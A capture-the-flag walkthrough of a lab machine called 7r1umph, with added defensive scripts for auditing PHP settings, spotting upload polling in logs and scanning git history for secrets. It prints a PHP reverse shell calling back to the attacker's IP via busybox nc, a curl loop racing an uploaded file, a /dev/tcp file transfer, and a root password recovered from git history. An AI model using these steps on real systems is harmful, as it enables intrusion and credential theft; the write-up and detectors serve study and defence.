mazesec 7r1umph

Information Gathering

# Nmap 7.95 scan initiated Sat Dec 13 04:39:06 2025 as: /usr/lib/nmap/nmap --privileged -sV -T4 -v -oN 192.168.110.201.nmap 192.168.110.201
Nmap scan report for 7r1umph.lan (192.168.110.201)
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:1A:68:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 13 04:39:17 2025 -- 1 IP address (1 host up) scanned in 11.86 seconds
# Dirsearch started Sat Dec 13 04:42:00 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.201/ -e zip,tar.gz,rar,bak,old,py,git,txt,php,html

403   280B   http://192.168.110.201/.ht_wsr.txt
403   280B   http://192.168.110.201/.htaccess.bak1
403   280B   http://192.168.110.201/.htaccess.sample
403   280B   http://192.168.110.201/.htaccess.save
403   280B   http://192.168.110.201/.htaccess.orig
403   280B   http://192.168.110.201/.htaccess_extra
403   280B   http://192.168.110.201/.htaccess_orig
403   280B   http://192.168.110.201/.htaccessOLD
403   280B   http://192.168.110.201/.htaccess_sc
403   280B   http://192.168.110.201/.htaccessBAK
403   280B   http://192.168.110.201/.htaccessOLD2
403   280B   http://192.168.110.201/.htm
403   280B   http://192.168.110.201/.html
403   280B   http://192.168.110.201/.htpasswds
403   280B   http://192.168.110.201/.httr-oauth
403   280B   http://192.168.110.201/.htpasswd_test
403   280B   http://192.168.110.201/.php
200   841B   http://192.168.110.201/index.php   # a file upload site
200   841B   http://192.168.110.201/index.php/login/ # same as above
200    23KB  http://192.168.110.201/info.php  # phpinfo() page
403   280B   http://192.168.110.201/server-status
403   280B   http://192.168.110.201/server-status/
301   316B   http://192.168.110.201/tmp    -> REDIRECTS TO: http://192.168.110.201/tmp/ # nothing in it
200   405B   http://192.168.110.201/tmp/
301   319B   http://192.168.110.201/upload    -> REDIRECTS TO: http://192.168.110.201/upload/  # uploaded files land here
200   407B   http://192.168.110.201/upload/
# Analysis of http://192.168.110.201/info.php
# disable_functions does not include exec() or popen()
disable_functions:system, passthru, shell_exec, proc_open, pcntl_exec, dl
# Conditions for LFI to RCE
session.upload_progress.enabled = On
session.upload_progress.cleanup = On # worth looking for an LFI
# Information disclosure
DOCUMENT_ROOT: /var/www/html
SCRIPT_FILENAME: /var/www/html/info.php
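An added check, not part of the original writeup, that parses the php.ini-style values observed above and reports the two gaps the writeup notes (command-execution functions left callable, and session.upload_progress enabled). The sample text is constructed from the values on the page; the list of command-execution functions is my own assumption.

```python
"""Added example (not from the original writeup): audit the PHP settings
observed on the target's info.php for the gaps the writeup points out.
The sample text is constructed from the values shown on the page."""
import re

# Functions that let a PHP script run OS commands.  Disabling only some
# of them, as the target does, leaves the others usable.
COMMAND_EXEC_FUNCS = {
    "exec", "passthru", "shell_exec", "system",
    "proc_open", "popen", "pcntl_exec", "dl",
}

# Constructed php.ini-style sample, values copied from the page.
SAMPLE_CONFIG = """
disable_functions = system, passthru, shell_exec, proc_open, pcntl_exec, dl
session.upload_progress.enabled = On
session.upload_progress.cleanup = On
"""

def parse_settings(text):
    """Return {directive: value} from 'key = value' or 'key => value' lines.
    phpinfo text shows 'local => master'; only the local value is kept."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([\w.]+)\s*=>?\s*(.*?)\s*$", line)
        if m:
            settings[m.group(1).lower()] = m.group(2).split("=>")[0].strip()
    return settings

def audit(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    s = parse_settings(text)
    findings = []
    disabled = {f.strip() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(COMMAND_EXEC_FUNCS - disabled)
    if missing:
        findings.append("disable_functions leaves callable: " + ", ".join(missing))
    if s.get("session.upload_progress.enabled", "").lower() == "on":
        findings.append("session.upload_progress.enabled=On: upload form data is written "
                        "into the session file, which matters if an include point exists; "
                        "set it Off unless progress bars are needed")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```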

Vulnerability Analysis

Every file uploaded through http://192.168.110.201/index.php gets .dsz appended to its name.

tmp holds cached files. Hypothesis: when a file is uploaded, the server appends the .dsz suffix to it, and the file may sit in tmp while that happens.

image 152.png

The hypothesis was confirmed.

Exploitation

<?php
// exec() is not in disable_functions, so it is used to spawn the reverse shell
exec("busybox nc 192.168.110.141 4444 -e bash");
?>

Start the polling loop:

while true; do curl http://192.168.110.201/tmp/shell.php; sleep 1;  done

Upload the file shell.php.
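From the defender's side, the polling loop above leaves a distinctive trace: one client requesting a .php path under /tmp/ every second until a 404 turns into a 200. This added detection example is not from the writeup; the Apache combined-format log lines are constructed, and the path prefixes and thresholds are my assumptions.

```python
"""Added example (not from the writeup): flag a client that repeatedly polls a
script under /tmp/ or /upload/ until the upload lands, from Apache access logs.
The log lines below are constructed to mirror the loop described on the page."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample: four polls of /tmp/shell.php a second apart, the last one
# succeeding after the upload POST, plus ordinary browsing from another client.
SAMPLE_LOG = """\
192.168.110.141 - - [13/Dec/2025:04:50:01 +0000] "GET /tmp/shell.php HTTP/1.1" 404 280 "-" "curl/8.5.0"
192.168.110.141 - - [13/Dec/2025:04:50:02 +0000] "GET /tmp/shell.php HTTP/1.1" 404 280 "-" "curl/8.5.0"
192.168.110.10 - - [13/Dec/2025:04:50:02 +0000] "GET /index.php HTTP/1.1" 200 841 "-" "Mozilla/5.0"
192.168.110.141 - - [13/Dec/2025:04:50:03 +0000] "GET /tmp/shell.php HTTP/1.1" 404 280 "-" "curl/8.5.0"
192.168.110.141 - - [13/Dec/2025:04:50:04 +0000] "POST /index.php HTTP/1.1" 200 841 "-" "curl/8.5.0"
192.168.110.141 - - [13/Dec/2025:04:50:04 +0000] "GET /tmp/shell.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
"""

def find_polling(log_text, min_requests=3, window_s=30):
    """Return {(client, path): (count, first_status, last_status)} for clients that
    GET a .php path under /tmp/ or /upload/ at least min_requests times within window_s."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, path, status = m.groups()
        if method == "GET" and path.endswith(".php") and path.startswith(("/tmp/", "/upload/")):
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            events[(client, path)].append((when, status))
    alerts = {}
    for key, hits in events.items():
        hits.sort()
        if len(hits) >= min_requests and (hits[-1][0] - hits[0][0]).total_seconds() <= window_s:
            alerts[key] = (len(hits), hits[0][1], hits[-1][1])
    return alerts

if __name__ == "__main__":
    for (client, path), (n, first, last) in find_polling(SAMPLE_LOG).items():
        print(f"{client} polled {path} {n} times: {first} -> {last}")
```

A 404-to-200 transition on a scripted path in a directory that should never serve PHP is the strongest signal; serving /tmp/ from the document root at all is the underlying misconfiguration.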

ls /home shows the user welcome.

After getting in, two files are found in /opt: a binary called guess and an image called yeyeye.png.

# listen on the attacking host
nc -lvnp 5555 > yeyeye.png

# on the target, send the file
cat yeyeye.png > /dev/tcp/192.168.110.141/5555

image 153.png

yeyeye.png

A Google reverse image search (uploading the image to Google) turned up this page: https://geocachen.be/geocaching/geocache-puzzels-oplossen/dorabella-cipher/ . From it the password was obtained: welcome:yecongdong

Logging in as welcome lands in a tmux environment.

Privilege Escalation

welcome@7r1umph:~$ ls -la
total 32
drwx------ 3 welcome welcome 4096 Apr 12  2025 .
drwxr-xr-x 3 root    root    4096 Apr 11  2025 ..
lrwxrwxrwx 1 root    root       9 Apr 11  2025 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome  220 Apr 11  2025 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11  2025 .bashrc
-rw-r--r-- 1 welcome welcome   42 Apr 12  2025 .gitconfig
-rw-r--r-- 1 welcome welcome  807 Apr 11  2025 .profile
drwxr-xr-x 3 root    root    4096 Apr 12  2025 RegView
-rw-r--r-- 1 root    root      44 Apr 12  2025 user.txt
lrwxrwxrwx 1 root    root       9 Apr 12  2025 .viminfo -> /dev/null
welcome@7r1umph:~$ cd RegView/
welcome@7r1umph:~/RegView$ ls -la
total 476
drwxr-xr-x 3 root    root      4096 Apr 12  2025 .
drwx------ 3 welcome welcome   4096 Apr 12  2025 ..
drwxr-xr-x 8 root    root      4096 Apr 12  2025 .git   # a .git directory
-rw-r--r-- 1 root    root       289 Dec  3  2024 poc.txt
-rw-r--r-- 1 root    root       936 Apr 12  2025 README.md
-rwxr-xr-x 1 root    root      3911 Apr 12  2025 RegView.sh
-rw-r--r-- 1 root    root    457296 Dec  3  2024 run.jpg
-rw-r--r-- 1 root    root      2095 Dec  3  2024 source.txt
$ git log -P
commit acd806aad21acb61112252234c7707bc8a74dd3c (HEAD -> main)
Author: bamuwe <bamuwe@qq.com>
Date:   Sat Apr 12 01:33:50 2025 -0400

    fix bug

diff --git a/source2.txt b/source2.txt
deleted file mode 100644
index fca9fc6..0000000
--- a/source2.txt
+++ /dev/null
@@ -1 +0,0 @@
-root:ff855ad811c79e5fba458a575fac5b83
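Review bot: deleting source2.txt does not remove the credential; the line `root:ff855ad811c79e5fba458a575fac5b83` is still readable in this commit's parent, which is how it is recovered from the git log here. The secret should be treated as compromised and rotated, and the file purged from history (for example with git filter-repo) before the repository is distributed; the message "fix bug" also gives no hint that a credential was involved, so the removal attracts no review. A pre-commit secret scan matching user:hash lines would have blocked the original commit.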

This reveals root's password: ff855ad811c79e5fba458a575fac5b83

welcome@7r1umph:~/RegView$ su root
Password:
root@7r1umph:/home/welcome/RegView# cat /root/root.txt
flag{root-ff855ad811c79e5fba458a575fac5b83}
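An added scanner, not the writeup's own tooling, that walks `git log -p --all` output and flags credential-looking lines whether they were added or removed, since a removed line is still in history. The sample log is constructed from the commit shown above; the secret patterns are my assumptions.

```python
"""Added example (not part of the writeup): scan `git log -p --all` output for
credential-looking lines in any commit.  The sample below is constructed from
the commit shown in the writeup."""
import re
import subprocess

SAMPLE_LOG = """\
commit acd806aad21acb61112252234c7707bc8a74dd3c
Author: bamuwe <bamuwe@qq.com>
Date:   Sat Apr 12 01:33:50 2025 -0400

    fix bug

diff --git a/source2.txt b/source2.txt
deleted file mode 100644
index fca9fc6..0000000
--- a/source2.txt
+++ /dev/null
@@ -1 +0,0 @@
-root:ff855ad811c79e5fba458a575fac5b83
"""

# 'user:32-hex' (MD5-like) lines and key=value style secrets (assumed patterns).
SECRET_PATTERNS = [
    re.compile(r"^\w+:[0-9a-f]{32}$", re.I),
    re.compile(r"(password|passwd|secret|api[_-]?key)\s*[=:]\s*\S+", re.I),
]

def scan_log(text):
    """Return [(commit, file, change, line)] for every diff line that looks like a secret.
    change is '+' for added or '-' for removed; a removed secret is still in history."""
    commit = path = None
    hits = []
    for line in text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            body = line[1:]
            if any(p.search(body) for p in SECRET_PATTERNS):
                hits.append((commit, path, line[0], body))
    return hits

def scan_repo(repo_dir):
    """Run git against a real checkout and scan every branch's full history."""
    out = subprocess.run(["git", "-C", repo_dir, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return scan_log(out)

if __name__ == "__main__":
    for commit, path, change, body in scan_log(SAMPLE_LOG):
        print(f"{commit[:12]} {path} {change} {body}")
```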

Lessons Learned

  • File content is controllable: we can upload arbitrary content, but .dsz is forcibly appended to the name.
  • Path control: traversal through the file name failed, confirming that the files stay firmly under /upload/.
  • No LFI: fuzzing both common and unusual parameters found no include point.
  • Parsing logic exposed: shell.php.svg.dsz was parsed as XML and raised an error; test1.png.dsz was parsed as an image and raised an error.
